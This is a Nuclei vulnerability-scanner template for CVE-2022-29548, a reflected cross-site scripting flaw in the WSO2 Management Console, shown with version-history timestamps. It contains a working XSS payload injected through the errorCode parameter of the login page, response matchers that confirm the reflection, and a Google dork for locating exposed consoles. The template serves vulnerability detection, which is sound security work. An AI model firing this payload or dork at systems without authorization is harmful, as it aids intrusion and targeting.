nuclei-templates/cves/2022/CVE-2022-29548.yaml

43 lines
1.1 KiB
YAML
Raw Normal View History

2022-05-09 10:25:53 +00:00
id: CVE-2022-29548
info:
name: WSO2 Management Console - Reflected XSS
author: edoardottt
severity: medium
2022-05-09 17:01:59 +00:00
description: |
A reflected XSS issue exists in the Management Console of several WSO2 products.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-29548
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603
2022-05-09 10:25:53 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29548
cwe-id: CWE-79
metadata:
google-dork: inurl:"carbon/admin/login"
verified: "true"
2022-05-09 17:01:59 +00:00
tags: cve,cve2022,wso2,xss
2022-05-09 10:25:53 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
matchers-condition: and
matchers:
2022-05-09 17:01:59 +00:00
- type: word
part: body
words:
- "CARBON.showWarningDialog('???');alert(document.domain)//???"
2022-05-09 10:25:53 +00:00
- type: word
part: header
words:
- "text/html"
2022-05-09 17:01:59 +00:00
- type: status
status:
- 200